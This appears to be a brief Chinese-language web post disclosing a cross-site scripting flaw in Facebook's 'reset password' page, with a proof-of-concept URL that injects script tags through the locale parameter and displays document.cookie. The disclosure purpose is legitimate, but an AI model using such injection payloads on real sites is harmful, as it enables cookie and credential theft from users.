注册
登录
| 关键词: Facebook Cscript 数以百万计 script Ealert 截图 脚本 漏洞 缺陷 document |
我们再次发现了一种新的重要的跨站点脚本漏洞影响Facebook的“ 重置密码 ”页面。 恶意用户可以注入代码,诱骗证书和其他敏感的个人信息从数以百万计的Facebook的成员。 我们希望,这一严重缺陷尽快得到解决。 XSS: http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 截图: |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
